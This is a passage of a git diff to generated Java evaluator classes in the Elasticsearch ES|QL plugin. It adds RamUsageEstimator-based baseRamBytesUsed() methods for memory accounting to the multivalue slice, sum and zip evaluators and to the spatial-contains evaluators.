EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvSliceBooleanEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -56,6 +59,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + baseRamBytesUsed += start.baseRamBytesUsed(); + baseRamBytesUsed += end.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BooleanBlock fieldBlock, IntBlock startBlock, IntBlock endBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSliceBytesRefEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSliceBytesRefEvaluator.java index 84c97343c7b47..dd9f93f1b7cf4 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSliceBytesRefEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSliceBytesRefEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.IntBlock; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class MvSliceBytesRefEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvSliceBytesRefEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -56,6 +59,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + baseRamBytesUsed += start.baseRamBytesUsed(); + baseRamBytesUsed += end.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock fieldBlock, IntBlock startBlock, IntBlock endBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSliceDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSliceDoubleEvaluator.java index f71f2ecf9fdb8..479f8d7374a23 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSliceDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSliceDoubleEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.IntBlock; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class MvSliceDoubleEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvSliceDoubleEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -56,6 +59,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + baseRamBytesUsed += start.baseRamBytesUsed(); + baseRamBytesUsed += end.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock fieldBlock, IntBlock startBlock, IntBlock endBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSliceIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSliceIntEvaluator.java index fa4b6ffa2130b..83b645cb385ff 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSliceIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSliceIntEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.Page; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class MvSliceIntEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvSliceIntEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -55,6 +58,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + baseRamBytesUsed += start.baseRamBytesUsed(); + baseRamBytesUsed += end.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, IntBlock fieldBlock, IntBlock startBlock, IntBlock endBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSliceLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSliceLongEvaluator.java index 7aa76eb53952e..f46940e6b5181 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSliceLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSliceLongEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.LongBlock; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class MvSliceLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvSliceLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -56,6 +59,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + baseRamBytesUsed += start.baseRamBytesUsed(); + baseRamBytesUsed += end.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock fieldBlock, IntBlock startBlock, IntBlock endBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSumDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSumDoubleEvaluator.java index b275415b2dd77..8139e9d369e2f 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSumDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSumDoubleEvaluator.java @@ -6,6 +6,7 @@ import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -18,6 +19,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvSumDoubleEvaluator extends AbstractMultivalueFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvSumDoubleEvaluator.class); + public MvSumDoubleEvaluator(EvalOperator.ExpressionEvaluator field, DriverContext driverContext) { super(driverContext, field); } @@ -79,6 +82,11 @@ public Block evalNotNullable(Block fieldVal) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final EvalOperator.ExpressionEvaluator.Factory field; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSumIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSumIntEvaluator.java index f22773bfb1540..b0b5a7e364d21 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSumIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSumIntEvaluator.java @@ -7,6 +7,7 @@ import java.lang.ArithmeticException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.operator.DriverContext; @@ -19,6 +20,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvSumIntEvaluator extends AbstractMultivalueFunction.AbstractNullableEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvSumIntEvaluator.class); + private final Source source; private Warnings warnings; @@ -79,6 +82,11 @@ private Warnings warnings() { return warnings; } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSumLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSumLongEvaluator.java index ae009b97852cf..405dd877a480a 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSumLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSumLongEvaluator.java @@ -7,6 +7,7 @@ import java.lang.ArithmeticException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.operator.DriverContext; @@ -19,6 +20,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvSumLongEvaluator extends AbstractMultivalueFunction.AbstractNullableEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvSumLongEvaluator.class); + private final Source source; private Warnings warnings; @@ -79,6 +82,11 @@ private Warnings warnings() { return warnings; } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSumUnsignedLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSumUnsignedLongEvaluator.java index 93566b531e06c..b6e5358ecf0ce 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSumUnsignedLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvSumUnsignedLongEvaluator.java @@ -7,6 +7,7 @@ import java.lang.ArithmeticException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.operator.DriverContext; @@ -19,6 +20,8 @@ * This class is generated. Edit {@code MvEvaluatorImplementer} instead. */ public final class MvSumUnsignedLongEvaluator extends AbstractMultivalueFunction.AbstractNullableEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvSumUnsignedLongEvaluator.class); + private final Source source; private Warnings warnings; @@ -79,6 +82,11 @@ private Warnings warnings() { return warnings; } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvZipEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvZipEvaluator.java index 557ba45f02cbe..26981d0a28c24 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvZipEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/multivalue/MvZipEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.Page; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class MvZipEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MvZipEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator leftField; @@ -55,6 +58,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += leftField.baseRamBytesUsed(); + baseRamBytesUsed += rightField.baseRamBytesUsed(); + baseRamBytesUsed += delim.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock leftFieldBlock, BytesRefBlock rightFieldBlock, BytesRefBlock delimBlock) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsCartesianPointDocValuesAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsCartesianPointDocValuesAndConstantEvaluator.java index d99e7086ee895..75ea36710b86a 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsCartesianPointDocValuesAndConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsCartesianPointDocValuesAndConstantEvaluator.java @@ -9,6 +9,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.geo.Component2D; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.LongBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SpatialContainsCartesianPointDocValuesAndConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialContainsCartesianPointDocValuesAndConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock leftBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsCartesianPointDocValuesAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsCartesianPointDocValuesAndSourceEvaluator.java index 956df2deb42f0..daf775cf7782b 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsCartesianPointDocValuesAndSourceEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsCartesianPointDocValuesAndSourceEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SpatialContainsCartesianPointDocValuesAndSourceEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialContainsCartesianPointDocValuesAndSourceEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -52,6 +55,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + baseRamBytesUsed += right.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock leftBlock, BytesRefBlock rightBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsCartesianSourceAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsCartesianSourceAndConstantEvaluator.java index 6375ba99122e0..931505f8bf353 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsCartesianSourceAndConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsCartesianSourceAndConstantEvaluator.java @@ -9,6 +9,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.geo.Component2D; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SpatialContainsCartesianSourceAndConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialContainsCartesianSourceAndConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock leftBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsCartesianSourceAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsCartesianSourceAndSourceEvaluator.java index 27c1c608faf6f..ba308745139e5 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsCartesianSourceAndSourceEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsCartesianSourceAndSourceEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SpatialContainsCartesianSourceAndSourceEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialContainsCartesianSourceAndSourceEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -51,6 +54,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + baseRamBytesUsed += right.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock leftBlock, BytesRefBlock rightBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsGeoPointDocValuesAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsGeoPointDocValuesAndConstantEvaluator.java index de384995136b8..7971102b2ca99 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsGeoPointDocValuesAndConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsGeoPointDocValuesAndConstantEvaluator.java @@ -9,6 +9,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.geo.Component2D; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.LongBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SpatialContainsGeoPointDocValuesAndConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialContainsGeoPointDocValuesAndConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock leftBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsGeoPointDocValuesAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsGeoPointDocValuesAndSourceEvaluator.java index 373d4829f46ed..c8506de599445 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsGeoPointDocValuesAndSourceEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsGeoPointDocValuesAndSourceEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SpatialContainsGeoPointDocValuesAndSourceEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialContainsGeoPointDocValuesAndSourceEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -52,6 +55,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + baseRamBytesUsed += right.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock leftBlock, BytesRefBlock rightBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsGeoSourceAndConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsGeoSourceAndConstantEvaluator.java index 83a927517b0db..dfad6c954aab1 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsGeoSourceAndConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsGeoSourceAndConstantEvaluator.java @@ -9,6 +9,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.geo.Component2D; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SpatialContainsGeoSourceAndConstantEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialContainsGeoSourceAndConstantEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock leftBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsGeoSourceAndSourceEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsGeoSourceAndSourceEvaluator.java index 87e58c8320ea2..89096f2328367 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsGeoSourceAndSourceEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialContainsGeoSourceAndSourceEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SpatialContainsGeoSourceAndSourceEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SpatialContainsGeoSourceAndSourceEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator left; @@ -51,6 +54,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += left.baseRamBytesUsed(); + baseRamBytesUsed += right.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock leftBlock, BytesRefBlock rightBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/SpatialDisjointCartesianPointDocValuesAndConstantEvaluator.java 